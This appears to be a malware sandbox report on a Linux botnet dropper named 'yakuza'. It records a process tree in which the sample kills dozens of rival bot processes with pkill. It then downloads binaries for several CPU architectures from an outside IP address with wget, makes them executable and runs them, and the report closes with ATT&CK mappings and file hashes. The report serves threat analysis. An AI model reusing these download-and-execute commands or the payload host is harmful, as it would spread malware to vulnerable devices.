    sh -c "pkill -9 ggtr || busybox pkill -9 ggtr"
    3⤵
    PID:2056
  - - /usr/bin/pkill
      pkill -9 ggtr
      4⤵
      PID:2059
  - - /bin/busybox
      busybox pkill -9 ggtr
      4⤵
      PID:2063
- - /bin/sh
    sh -c "pkill -9 14Fa || busybox pkill -9 14Fa"
    3⤵
    PID:2067
  - - /usr/bin/pkill
      pkill -9 14Fa
      4⤵
      PID:2068
  - - /bin/busybox
      busybox pkill -9 14Fa
      4⤵
      PID:2072
- - /bin/sh
    sh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"
    3⤵
    PID:2075
  - - /usr/bin/pkill
      pkill -9 SEXSLAVE1337
      4⤵
      PID:2078
  - - /bin/busybox
      busybox pkill -9 SEXSLAVE1337
      4⤵
      PID:2080
- - /bin/sh
    sh -c "pkill -9 ggtt || busybox pkill -9 ggtt"
    3⤵
    PID:2082
  - - /usr/bin/pkill
      pkill -9 ggtt
      4⤵
      PID:2083
  - - /bin/busybox
      busybox pkill -9 ggtt
      4⤵
      PID:2089
- - /bin/sh
    sh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"
    3⤵
    PID:2091
  - - /usr/bin/pkill
      pkill -9 1902a3u912u3u4
      4⤵
      PID:2092
  - - /bin/busybox
      busybox pkill -9 1902a3u912u3u4
      4⤵
      PID:2098
- - /bin/sh
    sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
    3⤵
    PID:2102
  - - /usr/bin/pkill
      pkill -9 SO190Ij1X
      4⤵
      PID:2103
  - - /bin/busybox
      busybox pkill -9 SO190Ij1X
      4⤵
      PID:2106
- - /bin/sh
    sh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"
    3⤵
    PID:2110
  - - /usr/bin/pkill
      pkill -9 haetrghbr
      4⤵
      PID:2112
  - - /bin/busybox
      busybox pkill -9 haetrghbr
      4⤵
      PID:2117
- - /bin/sh
    sh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"
    3⤵
    PID:2119
  - - /usr/bin/pkill
      pkill -9 19ju3d
      4⤵
      PID:2122
  - - /bin/busybox
      busybox pkill -9 19ju3d
      4⤵
      PID:2124
- - /bin/sh
    sh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"
    3⤵
    PID:2128
  - - /usr/bin/pkill
      pkill -9 SORAojkf120
      4⤵
      Reads runtime system information
      PID:2132
  - - /bin/busybox
      busybox pkill -9 SORAojkf120
      4⤵
      PID:2134
- - /bin/sh
    sh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"
    3⤵
    PID:2136
  - - /usr/bin/pkill
      pkill -9 hehahejeje92
      4⤵
      PID:2140
  - - /bin/busybox
      busybox pkill -9 hehahejeje92
      4⤵
      PID:2142
- - /bin/sh
    sh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"
    3⤵
    PID:2147
  - - /usr/bin/pkill
      pkill -9 2U2JDJA901F91
      4⤵
      Reads runtime system information
      PID:2150
  - - /bin/busybox
      busybox pkill -9 2U2JDJA901F91
      4⤵
      PID:2151
- - /bin/sh
    sh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"
    3⤵
    PID:2155
  - - /usr/bin/pkill
      pkill -9 SlaVLav12
      4⤵
      PID:2157
  - - /bin/busybox
      busybox pkill -9 SlaVLav12
      4⤵
      PID:2162
- - /bin/sh
    sh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"
    3⤵
    PID:2164
  - - /usr/bin/pkill
      pkill -9 helpmedaddthhhhh
      4⤵
      PID:2166
  - - /bin/busybox
      busybox pkill -9 helpmedaddthhhhh
      4⤵
      PID:2171
- - /bin/sh
    sh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"
    3⤵
    PID:2174
  - - /usr/bin/pkill
      pkill -9 2wgg9qphbq
      4⤵
      PID:2176
  - - /bin/busybox
      busybox pkill -9 2wgg9qphbq
      4⤵
      PID:2179
- - /bin/sh
    sh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"
    3⤵
    PID:2182
  - - /usr/bin/pkill
      pkill -9 Slav3Th3seD3vices
      4⤵
      Reads runtime system information
      PID:2185
  - - /bin/busybox
      busybox pkill -9 Slav3Th3seD3vices
      4⤵
      PID:2187
- - /bin/sh
    sh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"
    3⤵
    PID:2190
  - - /usr/bin/pkill
      pkill -9 hzSmYZjYMQ
      4⤵
      PID:2191
  - - /bin/busybox
      busybox pkill -9 hzSmYZjYMQ
      4⤵
      PID:2196
- - /bin/sh
    sh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"
    3⤵
    PID:2200
  - - /usr/bin/pkill
      pkill -9 5Gbf
      4⤵
      PID:2202
  - - /bin/busybox
      busybox pkill -9 5Gbf
      4⤵
      PID:2206
- - /bin/sh
    sh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"
    3⤵
    PID:2208
  - - /usr/bin/pkill
      pkill -9 SoRAxD123LOL
      4⤵
      PID:2212
  - - /bin/busybox
      busybox pkill -9 SoRAxD123LOL
      4⤵
      PID:2214
- - /bin/sh
    sh -c "pkill -9 iaGv || busybox pkill -9 iaGv"
    3⤵
    PID:2217
  - - /usr/bin/pkill
      pkill -9 iaGv
      4⤵
      PID:2222
  - - /bin/busybox
      busybox pkill -9 iaGv
      4⤵
      PID:2225
- - /bin/sh
    sh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"
    3⤵
    PID:2228
  - - /usr/bin/pkill
      pkill -9 5aA3
      4⤵
      PID:2231
  - - /bin/busybox
      busybox pkill -9 5aA3
      4⤵
      PID:2233
- - /bin/sh
    sh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"
    3⤵
    PID:2237
  - - /usr/bin/pkill
      pkill -9 SoRAxD420LOL
      4⤵
      PID:2238
  - - /bin/busybox
      busybox pkill -9 SoRAxD420LOL
      4⤵
      PID:2242
- - /bin/sh
    sh -c "pkill -9 insomni || busybox pkill -9 insomni"
    3⤵
    PID:2244
  - - /usr/bin/pkill
      pkill -9 insomni
      4⤵
      PID:2249
  - - /bin/busybox
      busybox pkill -9 insomni
      4⤵
      PID:2251
- - /bin/sh
    sh -c "pkill -9 640277 || busybox pkill -9 640277"
    3⤵
    PID:2254
  - - /usr/bin/pkill
      pkill -9 640277
      4⤵
      PID:2257
  - - /bin/busybox
      busybox pkill -9 640277
      4⤵
      PID:2261
- - /bin/sh
    sh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"
    3⤵
    PID:2266
  - - /usr/bin/pkill
      pkill -9 SoraBeReppin1337
      4⤵
      PID:2267
  - - /bin/busybox
      busybox pkill -9 SoraBeReppin1337
      4⤵
      PID:2268
- - /bin/sh
    sh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"
    3⤵
    - System Network Configuration Discovery
    PID:2271
  - - /usr/bin/pkill
      pkill -9 ipcamCache
      4⤵
      System Network Configuration Discovery
      PID:2274
  - - /bin/busybox
      busybox pkill -9 ipcamCache
      4⤵
      System Network Configuration Discovery
      PID:2277
- - /bin/sh
    sh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"
    3⤵
    PID:2281
  - - /usr/bin/pkill
      pkill -9 66tlGg9Q
      4⤵
      PID:2283
  - - /bin/busybox
      busybox pkill -9 66tlGg9Q
      4⤵
      PID:2286
- - /bin/sh
    sh -c "pkill -9 T || busybox pkill -9 T"
    3⤵
    PID:2289
  - - /usr/bin/pkill
      pkill -9 T
      4⤵
      PID:2292
  - - /bin/busybox
      busybox pkill -9 T
      4⤵
      PID:2297
- - /bin/sh
    sh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"
    3⤵
    PID:2300
  - - /usr/bin/pkill
      pkill -9 jUYfouyf87
      4⤵
      PID:2302
  - - /bin/busybox
      busybox pkill -9 jUYfouyf87
      4⤵
      PID:2305
- - /bin/sh
    sh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"
    3⤵
    PID:2308
  - - /usr/bin/pkill
      pkill -9 6ke3
      4⤵
      Reads CPU attributes
      PID:2311
  - - /bin/busybox
      busybox pkill -9 6ke3
      4⤵
      PID:2315
- - /bin/sh
    sh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3"
    3⤵
    PID:2318
  - - /usr/bin/pkill
      pkill -9 TOKYO3
      4⤵
      PID:2321
  - - /bin/busybox
      busybox pkill -9 TOKYO3
      4⤵
      PID:2323
- - /bin/sh
    sh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh"
    3⤵
    PID:2325
  - - /usr/bin/pkill
      pkill -9 lyEeaXul2dULCVxh
      4⤵
      PID:2326
  - - /bin/busybox
      busybox pkill -9 lyEeaXul2dULCVxh
      4⤵
      PID:2333
- - /bin/sh
    sh -c "pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z"
    3⤵
    PID:2335
  - - /usr/bin/pkill
      pkill -9 93OfjHZ2z
      4⤵
      Reads CPU attributes
      PID:2338
  - - /bin/busybox
      busybox pkill -9 93OfjHZ2z
      4⤵
      PID:2341
- - /bin/sh
    sh -c "pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r"
    3⤵
    PID:2345
  - - /usr/bin/pkill
      pkill -9 TY2gD6MZvKc7KU6r
      4⤵
      PID:2348
  - - /bin/busybox
      busybox pkill -9 TY2gD6MZvKc7KU6r
      4⤵
      PID:2351
- - /bin/sh
    sh -c "pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l"
    3⤵
    PID:2356
  - - /usr/bin/pkill
      pkill -9 mMkiy6f87l
      4⤵
      PID:2357
  - - /bin/busybox
      busybox pkill -9 mMkiy6f87l
      4⤵
      PID:2359
- - /bin/sh
    sh -c "pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU"
    3⤵
    PID:2364
  - - /usr/bin/pkill
      pkill -9 A023UU4U24UIU
      4⤵
      PID:2365
  - - /bin/busybox
      busybox pkill -9 A023UU4U24UIU
      4⤵
      PID:2368
- - /bin/sh
    sh -c "pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd"
    3⤵
    PID:2370
  - - /usr/bin/pkill
      pkill -9 TheWeeknd
      4⤵
      PID:2374
  - - /bin/busybox
      busybox pkill -9 TheWeeknd
      4⤵
      PID:2376
- - /bin/sh
    sh -c "pkill -9 mioribitches || busybox pkill -9 mioribitches"
    3⤵
    PID:2381
  - - /usr/bin/pkill
      pkill -9 mioribitches
      4⤵
      PID:2383
  - - /bin/busybox
      busybox pkill -9 mioribitches
      4⤵
      PID:2385
- - /bin/sh
    sh -c "pkill -9 A5p9 || busybox pkill -9 A5p9"
    3⤵
    PID:2391
  - - /usr/bin/pkill
      pkill -9 A5p9
      4⤵
      PID:2393
  - - /bin/busybox
      busybox pkill -9 A5p9
      4⤵
      PID:2395
- - /bin/sh
    sh -c "pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds"
    3⤵
    PID:2397
  - - /usr/bin/pkill
      pkill -9 TheWeeknds
      4⤵
      PID:2398
  - - /bin/busybox
      busybox pkill -9 TheWeeknds
      4⤵
      PID:2403
- - /bin/sh
    sh -c "pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi"
    3⤵
    PID:2406
  - - /usr/bin/pkill
      pkill -9 mnblkjpoi
      4⤵
      PID:2409
  - - /bin/busybox
      busybox pkill -9 mnblkjpoi
      4⤵
      PID:2414
- - /bin/sh
    sh -c "pkill -9 AbAd || busybox pkill -9 AbAd"
    3⤵
    PID:2417
  - - /usr/bin/pkill
      pkill -9 AbAd
      4⤵
      PID:2420
  - - /bin/busybox
      busybox pkill -9 AbAd
      4⤵
      PID:2423
- - /bin/sh
    sh -c "pkill -9 Tokyos || busybox pkill -9 Tokyos"
    3⤵
    PID:2426
  - - /usr/bin/pkill
      pkill -9 Tokyos
      4⤵
      PID:2429
  - - /bin/busybox
      busybox pkill -9 Tokyos
      4⤵
      PID:2431
- - /bin/sh
    sh -c "pkill -9 neb || busybox pkill -9 neb"
    3⤵
    PID:2434
  - - /usr/bin/pkill
      pkill -9 neb
      4⤵
      Reads CPU attributes
      PID:2436
  - - /bin/busybox
      busybox pkill -9 neb
      4⤵
      PID:2440
- - /bin/sh
    sh -c "pkill -9 Akiru || busybox pkill -9 Akiru"
    3⤵
    PID:2443
  - - /usr/bin/pkill
      pkill -9 Akiru
      4⤵
      PID:2445
  - - /bin/busybox
      busybox pkill -9 Akiru
      4⤵
      PID:2450
- - /bin/sh
    sh -c "pkill -9 U8inTz || busybox pkill -9 U8inTz"
    3⤵
    PID:2451
  - - /usr/bin/pkill
      pkill -9 U8inTz
      4⤵
      PID:2454
  - - /bin/busybox
      busybox pkill -9 U8inTz
      4⤵
      PID:2459
- - /bin/sh
    sh -c "pkill -9 netstats || busybox pkill -9 netstats"
    3⤵
    PID:2462
  - - /usr/bin/pkill
      pkill -9 netstats
      4⤵
      Reads runtime system information
      PID:2465
  - - /bin/busybox
      busybox pkill -9 netstats
      4⤵
      PID:2467
- - /bin/sh
    sh -c "pkill -9 Alex || busybox pkill -9 Alex"
    3⤵
    PID:2471
  - - /usr/bin/pkill
      pkill -9 Alex
      4⤵
      PID:2474
  - - /bin/busybox
      busybox pkill -9 Alex
      4⤵
      PID:2476
- - /bin/sh
    sh -c "pkill -9 W9RCAKM20T || busybox pkill -9 W9RCAKM20T"
    3⤵
    PID:2478
  - - /usr/bin/pkill
      pkill -9 W9RCAKM20T
      4⤵
      Reads runtime system information
      PID:2483
  - - /bin/busybox
      busybox pkill -9 W9RCAKM20T
      4⤵
      PID:2486
- - /bin/sh
    sh -c "pkill -9 newnetword || busybox pkill -9 newnetword"
    3⤵
    PID:2489
  - - /usr/bin/pkill
      pkill -9 newnetword
      4⤵
      PID:2490
  - - /bin/busybox
      busybox pkill -9 newnetword
      4⤵
      PID:2493
- - /bin/sh
    sh -c "pkill -9 Ayo215 || busybox pkill -9 Ayo215"
    3⤵
    PID:2496
  - - /usr/bin/pkill
      pkill -9 Ayo215
      4⤵
      PID:2500
  - - /bin/busybox
      busybox pkill -9 Ayo215
      4⤵
      PID:2502
- - /bin/sh
    sh -c "pkill -9 Word || busybox pkill -9 Word"
    3⤵
    PID:2506
  - - /usr/bin/pkill
      pkill -9 Word
      4⤵
      PID:2507
  - - /bin/busybox
      busybox pkill -9 Word
      4⤵
      PID:2511
- - /bin/sh
    sh -c "pkill -9 nloads || busybox pkill -9 nloads"
    3⤵
    PID:2515
  - - /usr/bin/pkill
      pkill -9 nloads
      4⤵
      PID:2518
  - - /bin/busybox
      busybox pkill -9 nloads
      4⤵
      PID:2522
- - /bin/sh
    sh -c "pkill -9 BAdAsV || busybox pkill -9 BAdAsV"
    3⤵
    PID:2525
  - - /usr/bin/pkill
      pkill -9 BAdAsV
      4⤵
      PID:2528
  - - /bin/busybox
      busybox pkill -9 BAdAsV
      4⤵
      PID:2531
- - /bin/sh
    sh -c "pkill -9 Wordmane || busybox pkill -9 Wordmane"
    3⤵
    PID:2534
  - - /usr/bin/pkill
      pkill -9 Wordmane
      4⤵
      Reads runtime system information
      PID:2537
  - - /bin/busybox
      busybox pkill -9 Wordmane
      4⤵
      PID:2540
- - /bin/sh
    sh -c "pkill -9 notyakuzaa || busybox pkill -9 notyakuzaa"
    3⤵
    PID:2545
  - - /usr/bin/pkill
      pkill -9 notyakuzaa
      4⤵
      PID:2546
  - - /bin/busybox
      busybox pkill -9 notyakuzaa
      4⤵
      PID:2549
- - /bin/sh
    sh -c "pkill -9 Belch || busybox pkill -9 Belch"
    3⤵
    PID:2551
  - - /usr/bin/pkill
      pkill -9 Belch
      4⤵
      PID:2554
  - - /bin/busybox
      busybox pkill -9 Belch
      4⤵
      PID:2558
- - /bin/sh
    sh -c "pkill -9 Wordnets || busybox pkill -9 Wordnets"
    3⤵
    PID:2563
  - - /usr/bin/pkill
      pkill -9 Wordnets
      4⤵
      PID:2564
  - - /bin/busybox
      busybox pkill -9 Wordnets
      4⤵
      PID:2565
- /bin/rm
  rm -rf yakuza.i586
  2⤵
  PID:1575
- /usr/bin/wget
  wget http://79.23.237.23/yakuza.m68k
  2⤵
  - Writes file to tmp directory
  PID:1580
- /bin/chmod
  chmod +x yakuza.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1588
- /tmp/yakuza.m68k
  ./yakuza.m68k
  2⤵
  PID:1589
- /bin/rm
  rm -rf yakuza.m68k
  2⤵
  PID:1591
- /usr/bin/wget
  wget http://79.23.237.23/yakuza.arm4
  2⤵
  - Writes file to tmp directory
  PID:1592
- /bin/chmod
  chmod +x yakuza.arm4
  2⤵
  - File and Directory Permissions Modification
  PID:1593
- /tmp/yakuza.arm4
  ./yakuza.arm4
  2⤵
  PID:1594
- /bin/rm
  rm -rf yakuza.arm4
  2⤵
  PID:1596
- /usr/bin/wget
  wget http://79.23.237.23/yakuza.arm5
  2⤵
  - Writes file to tmp directory
  PID:1597
- /bin/chmod
  chmod +x yakuza.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:1607
- /tmp/yakuza.arm5
  ./yakuza.arm5
  2⤵
  PID:1608
- /bin/rm
  rm -rf yakuza.arm5
  2⤵
  PID:1610
- /usr/bin/wget
  wget http://79.23.237.23/yakuza.arm7
  2⤵
  - Writes file to tmp directory
  PID:1611
- /bin/chmod
  chmod +x yakuza.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:1612
- /tmp/yakuza.arm7
  ./yakuza.arm7
  2⤵
  PID:1613
- /bin/rm
  rm -rf yakuza.arm7
  2⤵
  PID:1615
- /usr/bin/wget
  wget http://79.23.237.23/yakuza.sparc
  2⤵
  - Writes file to tmp directory
  PID:1616
- /bin/chmod
  chmod +x yakuza.sparc
  2⤵
  - File and Directory Permissions Modification
  PID:1626
- /tmp/yakuza.sparc
  ./yakuza.sparc
  2⤵
  PID:1627
- /bin/rm
  rm -rf yakuza.sparc
  2⤵
  PID:1629

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/yakuza.mips

Filesize
183KB

MD5
fe20c84814e3b28ab3b4d72949f09c9a

SHA1
0bf1e245ca54ea279f349a6110ea3cf2a90bafc8

SHA256
cf50bcd9a2ed02b09dc85b05f13526a850da52e616d16d93224282c464c21468

SHA512
9a6d894da0f1c50f7ca27f2452d4dc9f531427a417ebb5a2eaa76bb020279fc8171f2926daf25c25817766ea7bf4b85dec2bec1e28a340cd2548c21ec07b8203

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads